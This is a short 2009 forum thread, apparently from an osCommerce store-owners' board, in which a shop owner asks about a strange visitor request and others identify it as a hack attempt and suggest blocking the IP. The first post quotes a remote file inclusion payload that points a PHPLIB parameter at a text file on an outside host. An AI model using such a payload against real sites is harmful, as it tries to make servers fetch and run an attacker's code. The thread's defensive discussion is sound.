Jump to content


Corporate Sponsors


Latest News: (loading..)

- - - - -

Customer or Hack attempt?


  • You cannot reply to this topic
3 replies to this topic

#1 Mort-lemur

  • Community Member
  • 898 posts
  • Real Name:Heather
  • Gender:Female
  • Location:UK

Posted 07 November 2009, 15:50

Hi,

Just saw a customer online looking at this //?_PHPLIB[libdir]=http://jokoyuma.fileave.com/iddua.txt??? he had an IP address of 85.111.12.199

anyone know what this could be??
Now my store is the way I want it - Secure, working well, and good Google Ranks - Thanks to all for the help given.

If you want to see the mods I have installed, then see my profile.

#2 usernamenone

  • Community Member
  • 2,163 posts
  • Real Name:Lola
  • Gender:Female
  • Location:United States

Posted 08 November 2009, 04:53

Well, it probably is

http://dnsbl.abuse.c...s=85.111.12.199

You should block his ip in the control panel if you can.

Edited by usernamenone, 08 November 2009, 04:55.


#3 Coopco

  • Community Member
  • 9,557 posts
  • Real Name:Leslie Cooper
  • Gender:Male
  • Location:Sea Lake, Victoria, Australia

Posted 08 November 2009, 08:24

View Postusernamenone, on 08 November 2009, 04:53, said:

Well, it probably is

http://dnsbl.abuse.c...s=85.111.12.199

You should block his ip in the control panel if you can.
I ban anything that is not a normal osc link.


The Coopco Underwear Shop



If you live to be 100 years of age, that means you have lived for 36,525 days. Don't waste another, there aren't many left.

#4 Jan Zonjee

  • Team Member
  • 6,975 posts
  • Real Name:Jan Zonjee
  • Gender:Male
  • Location:the Netherlands

Posted 08 November 2009, 08:31

View PostMort-lemur, on 07 November 2009, 15:50, said:

Just saw a customer online looking at this //?_PHPLIB[libdir]=http://jokoyuma.fileave.com/iddua.txt??? he had an IP address of 85.111.12.199

anyone know what this could be??
Indeed a hack attempt.